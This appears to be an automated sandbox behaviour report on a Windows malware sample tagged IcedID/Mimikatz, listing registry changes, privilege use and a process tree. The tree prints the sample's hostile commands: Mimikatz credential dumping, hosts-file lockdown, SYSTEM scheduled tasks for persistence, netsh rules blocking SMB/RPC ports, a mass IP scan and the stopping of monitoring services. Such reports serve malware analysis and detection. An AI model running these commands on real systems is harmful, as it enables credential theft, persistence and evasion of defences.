2024-10-12_c39cb7665320e8eb07d9da0c601d167f_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vrguwycnn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bmesabc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4572 cmd.exe 4160 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023c9a-6.dat nsis_installer_2 behavioral2/files/0x0008000000023ca8-14.dat nsis_installer_1 behavioral2/files/0x0008000000023ca8-14.dat nsis_installer_2 -
Modifies data under HKEY_USERS 41 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" bmesabc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing bmesabc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" bmesabc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ bmesabc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" bmesabc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" bmesabc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump nbriuecau.exe Key created \REGISTRY\USER\.DEFAULT\Software nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" nbriuecau.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ bmesabc.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4160 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1588 schtasks.exe 4632 schtasks.exe 1320 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3480 2024-10-12_c39cb7665320e8eb07d9da0c601d167f_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 3480 2024-10-12_c39cb7665320e8eb07d9da0c601d167f_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2140 bmesabc.exe Token: SeDebugPrivilege 1472 bmesabc.exe Token: SeDebugPrivilege 3384 vfshost.exe Token: SeDebugPrivilege 2004 nbriuecau.exe Token: SeLockMemoryPrivilege 3264 ysiisu.exe Token: SeLockMemoryPrivilege 3264 ysiisu.exe Token: SeDebugPrivilege 1448 nbriuecau.exe Token: SeDebugPrivilege 3744 nbriuecau.exe Token: SeDebugPrivilege 1436 nbriuecau.exe Token: SeDebugPrivilege 3548 nbriuecau.exe Token: SeDebugPrivilege 1476 nbriuecau.exe Token: SeDebugPrivilege 4284 nbriuecau.exe Token: SeDebugPrivilege 688 nbriuecau.exe Token: SeDebugPrivilege 1936 nbriuecau.exe Token: SeDebugPrivilege 1460 nbriuecau.exe Token: SeDebugPrivilege 5048 nbriuecau.exe Token: SeDebugPrivilege 4852 nbriuecau.exe Token: SeDebugPrivilege 1948 nbriuecau.exe Token: SeDebugPrivilege 1648 nbriuecau.exe Token: SeDebugPrivilege 4308 nbriuecau.exe Token: SeDebugPrivilege 3000 nbriuecau.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3480 2024-10-12_c39cb7665320e8eb07d9da0c601d167f_hacktools_icedid_mimikatz.exe 3480 2024-10-12_c39cb7665320e8eb07d9da0c601d167f_hacktools_icedid_mimikatz.exe 2140 bmesabc.exe 2140 bmesabc.exe 1472 bmesabc.exe 1472 bmesabc.exe 552 xohudmc.exe 3848 ascsoo.exe 4664 bmesabc.exe 4664 bmesabc.exe 5264 bmesabc.exe 5264 bmesabc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3480 wrote to memory of 4572 3480 2024-10-12_c39cb7665320e8eb07d9da0c601d167f_hacktools_icedid_mimikatz.exe 85 PID 3480 wrote to memory of 4572 3480 2024-10-12_c39cb7665320e8eb07d9da0c601d167f_hacktools_icedid_mimikatz.exe 85 PID 3480 wrote to memory of 4572 3480 2024-10-12_c39cb7665320e8eb07d9da0c601d167f_hacktools_icedid_mimikatz.exe 85 PID 4572 wrote to memory of 4160 4572 cmd.exe 87 PID 4572 wrote to memory of 4160 4572 cmd.exe 87 PID 4572 wrote to memory of 4160 4572 cmd.exe 87 PID 4572 wrote to memory of 2140 4572 cmd.exe 89 PID 4572 wrote to memory of 2140 4572 cmd.exe 89 PID 4572 wrote to memory of 2140 4572 cmd.exe 89 PID 1472 wrote to memory of 4788 1472 bmesabc.exe 91 PID 1472 wrote to memory of 4788 1472 bmesabc.exe 91 PID 1472 wrote to memory of 4788 1472 bmesabc.exe 91 PID 4788 wrote to memory of 3476 4788 cmd.exe 93 PID 4788 wrote to memory of 3476 4788 cmd.exe 93 PID 4788 wrote to memory of 3476 4788 cmd.exe 93 PID 4788 wrote to memory of 3680 4788 cmd.exe 94 PID 4788 wrote to memory of 3680 4788 cmd.exe 94 PID 4788 wrote to memory of 3680 4788 cmd.exe 94 PID 4788 wrote to memory of 4080 4788 cmd.exe 95 PID 4788 wrote to memory of 4080 4788 cmd.exe 95 PID 4788 wrote to memory of 4080 4788 cmd.exe 95 PID 4788 wrote to memory of 4872 4788 cmd.exe 96 PID 4788 wrote to memory of 4872 4788 cmd.exe 96 PID 4788 wrote to memory of 4872 4788 cmd.exe 96 PID 4788 wrote to memory of 1484 4788 cmd.exe 97 PID 4788 wrote to memory of 1484 4788 cmd.exe 97 PID 4788 wrote to memory of 1484 4788 cmd.exe 97 PID 4788 wrote to memory of 3464 4788 cmd.exe 98 PID 4788 wrote to memory of 3464 4788 cmd.exe 98 PID 4788 wrote to memory of 3464 4788 cmd.exe 98 PID 1472 wrote to memory of 2380 1472 bmesabc.exe 99 PID 1472 wrote to memory of 2380 1472 bmesabc.exe 99 PID 1472 wrote to memory of 2380 1472 bmesabc.exe 99 PID 1472 wrote to memory of 4852 1472 bmesabc.exe 101 PID 1472 wrote to memory of 4852 1472 bmesabc.exe 101 PID 1472 wrote to memory of 4852 1472 bmesabc.exe 101 PID 1472 wrote to memory of 1240 1472 bmesabc.exe 103 PID 1472 wrote to memory of 1240 1472 bmesabc.exe 103 PID 1472 wrote to memory of 1240 1472 bmesabc.exe 103 PID 1472 wrote to memory of 1968 1472 bmesabc.exe 107 PID 1472 wrote to memory of 1968 1472 bmesabc.exe 107 PID 1472 wrote to memory of 1968 1472 bmesabc.exe 107 PID 1968 wrote to memory of 3744 1968 cmd.exe 109 PID 1968 wrote to memory of 3744 1968 cmd.exe 109 PID 1968 wrote to memory of 3744 1968 cmd.exe 109 PID 3744 wrote to memory of 4492 3744 wpcap.exe 110 PID 3744 wrote to memory of 4492 3744 wpcap.exe 110 PID 3744 wrote to memory of 4492 3744 wpcap.exe 110 PID 4492 wrote to memory of 1936 4492 net.exe 112 PID 4492 wrote to memory of 1936 4492 net.exe 112 PID 4492 wrote to memory of 1936 4492 net.exe 112 PID 3744 wrote to memory of 3352 3744 wpcap.exe 113 PID 3744 wrote to memory of 3352 3744 wpcap.exe 113 PID 3744 wrote to memory of 3352 3744 wpcap.exe 113 PID 3352 wrote to memory of 2020 3352 net.exe 115 PID 3352 wrote to memory of 2020 3352 net.exe 115 PID 3352 wrote to memory of 2020 3352 net.exe 115 PID 3744 wrote to memory of 3132 3744 wpcap.exe 116 PID 3744 wrote to memory of 3132 3744 wpcap.exe 116 PID 3744 wrote to memory of 3132 3744 wpcap.exe 116 PID 3132 wrote to memory of 4380 3132 net.exe 118 PID 3132 wrote to memory of 4380 3132 net.exe 118 PID 3132 wrote to memory of 4380 3132 net.exe 118 PID 3744 wrote to memory of 964 3744 wpcap.exe 119
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2096
-
C:\Windows\TEMP\ilsrygknu\ysiisu.exe"C:\Windows\TEMP\ilsrygknu\ysiisu.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3264
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-12_c39cb7665320e8eb07d9da0c601d167f_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-12_c39cb7665320e8eb07d9da0c601d167f_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bisbgtln\bmesabc.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4160
-
-
C:\Windows\bisbgtln\bmesabc.exeC:\Windows\bisbgtln\bmesabc.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2140
-
-
-
C:\Windows\bisbgtln\bmesabc.exeC:\Windows\bisbgtln\bmesabc.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3476
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:3680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4080
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:4872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1484
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:3464
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2380
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4852
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1240
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tqgibwews\cuincnwui\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\tqgibwews\cuincnwui\wpcap.exeC:\Windows\tqgibwews\cuincnwui\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1936
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:2020
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:4380
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:964 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:724
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4072 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4316 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2220
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4624 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3560
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1868
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tqgibwews\cuincnwui\vrguwycnn.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tqgibwews\cuincnwui\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:3332 -
C:\Windows\tqgibwews\cuincnwui\vrguwycnn.exeC:\Windows\tqgibwews\cuincnwui\vrguwycnn.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tqgibwews\cuincnwui\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tqgibwews\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tqgibwews\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4704 -
C:\Windows\tqgibwews\Corporate\vfshost.exeC:\Windows\tqgibwews\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3384
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "wisbvlvns" /ru system /tr "cmd /c C:\Windows\ime\bmesabc.exe"2⤵PID:5104
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "wisbvlvns" /ru system /tr "cmd /c C:\Windows\ime\bmesabc.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gtigcicuh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bisbgtln\bmesabc.exe /p everyone:F"2⤵PID:1324
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2160
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "gtigcicuh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bisbgtln\bmesabc.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gtueuuysy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ilsrygknu\ysiisu.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:4152 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "gtueuuysy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ilsrygknu\ysiisu.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4632
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4356
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4924
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:824
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2528
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1448
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1960
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4912
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4404
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1048
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
